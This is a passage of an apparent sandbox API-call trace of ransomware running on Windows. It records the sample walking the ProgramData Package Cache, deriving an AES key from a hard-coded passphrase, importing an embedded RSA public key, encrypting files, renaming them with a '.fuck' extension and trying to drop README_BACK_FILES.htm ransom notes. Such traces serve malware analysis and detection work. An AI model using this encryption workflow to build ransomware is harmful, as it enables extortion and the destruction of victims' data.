cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0238.169] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0238.169] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.169] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.170] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.170] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a9c0) returned 1 [0238.172] CryptCreateHash (in: hProv=0x285a9c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.172] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.172] CryptHashData (hHash=0x27eaa10, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.172] CryptDeriveKey (in: hProv=0x285a9c0, Algid=0x6610, hBaseData=0x27eaa10, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ead10) returned 1 [0238.172] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.172] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.172] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285af98) returned 1 [0238.172] CryptImportPublicKeyInfo (in: hCryptProv=0x285af98, dwCertEncodingType=0x1, pInfo=0x28696c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28696f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869700*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27ea890) returned 1 [0238.172] CryptEncrypt (in: hKey=0x27ea890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.172] CryptEncrypt (in: hKey=0x27ea890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b020*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285b020*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.173] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b020, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.173] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.173] CryptEncrypt (in: hKey=0x27ead10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.173] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.173] CloseHandle (hObject=0xffffffff) returned 1 [0238.173] CloseHandle (hObject=0xffffffff) returned 1 [0238.173] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), bFailIfExists=0) returned 0 [0238.173] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x0) returned 0 [0238.174] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg")) returned 0 [0238.174] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.fuck" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.fuck")) returned 0 [0238.174] CryptDestroyHash (hHash=0x27eaa10) returned 1 [0238.174] CryptDestroyKey (hKey=0x27ead10) returned 1 [0238.174] CryptReleaseContext (hProv=0x285a9c0, dwFlags=0x0) returned 1 [0238.174] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.175] FindClose (in: hFindFile=0x27eacd0 | out: hFindFile=0x27eacd0) returned 1 [0238.175] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\readme_back_files.htm")) returned 0xffffffff [0238.175] AreFileApisANSI () returned 1 [0238.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286da70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0238.175] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.175] GetLastError () returned 0x5 [0238.175] GetLastError () returned 0x5 [0238.175] FindNextFileA (in: hFindFile=0x27eaa50, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.175] FindClose (in: hFindFile=0x27eaa50 | out: hFindFile=0x27eaa50) returned 1 [0238.176] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.176] AreFileApisANSI () returned 1 [0238.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.176] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.176] GetLastError () returned 0x5 [0238.176] GetLastError () returned 0x5 [0238.176] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.176] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.177] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\readme_back_files.htm")) returned 0xffffffff [0238.177] AreFileApisANSI () returned 1 [0238.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.177] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.177] GetLastError () returned 0x5 [0238.177] GetLastError () returned 0x5 [0238.177] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.177] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eac90 [0238.178] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.178] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.178] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.178] GetLastError () returned 0x5 [0238.178] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm")) returned 0x20 [0238.179] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", dwFileAttributes=0x80) returned 0 [0238.179] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.180] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.180] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0238.180] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x285a9c0) returned 1 [0238.183] CryptCreateHash (in: hProv=0x285a9c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.183] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.183] CryptHashData (hHash=0x27ea990, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.183] CryptDeriveKey (in: hProv=0x285a9c0, Algid=0x6610, hBaseData=0x27ea990, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x27eaf90) returned 1 [0238.183] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.183] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.183] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x285aad0) returned 1 [0238.184] CryptImportPublicKeyInfo (in: hCryptProv=0x285aad0, dwCertEncodingType=0x1, pInfo=0x2869ad8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869b08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869b10*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27eae50) returned 1 [0238.184] CryptEncrypt (in: hKey=0x27eae50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.184] CryptEncrypt (in: hKey=0x27eae50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285af10*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x285af10*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.184] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285af10, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.185] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.185] CryptEncrypt (in: hKey=0x27eaf90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.185] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.185] CloseHandle (hObject=0xffffffff) returned 1 [0238.185] CloseHandle (hObject=0xffffffff) returned 1 [0238.185] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), bFailIfExists=0) returned 0 [0238.185] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", dwFileAttributes=0x0) returned 0 [0238.185] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg")) returned 0 [0238.186] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.fuck" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.fuck")) returned 0 [0238.186] CryptDestroyHash (hHash=0x27ea990) returned 1 [0238.186] CryptDestroyKey (hKey=0x27eaf90) returned 1 [0238.186] CryptReleaseContext (hProv=0x285a9c0, dwFlags=0x0) returned 1 [0238.186] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.186] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.186] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.189] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\readme_back_files.htm")) returned 0xffffffff [0238.190] AreFileApisANSI () returned 1 [0238.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2856ff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0238.190] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.190] GetLastError () returned 0x5 [0238.190] GetLastError () returned 0x5 [0238.190] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.190] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27ead50 [0238.191] FindNextFileA (in: hFindFile=0x27ead50, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.191] FindNextFileA (in: hFindFile=0x27ead50, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.191] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27ea810 [0238.191] FindNextFileA (in: hFindFile=0x27ea810, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.191] FindNextFileA (in: hFindFile=0x27ea810, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.191] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27eac90 [0238.191] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.191] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.191] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.191] GetLastError () returned 0x5 [0238.192] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0238.192] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.192] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.192] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.192] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.193] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285b1b8) returned 1 [0238.195] CryptCreateHash (in: hProv=0x285b1b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.195] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.195] CryptHashData (hHash=0x27eaa50, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.195] CryptDeriveKey (in: hProv=0x285b1b8, Algid=0x6610, hBaseData=0x27eaa50, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27eae90) returned 1 [0238.195] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.195] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.195] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285b708) returned 1 [0238.195] CryptImportPublicKeyInfo (in: hCryptProv=0x285b708, dwCertEncodingType=0x1, 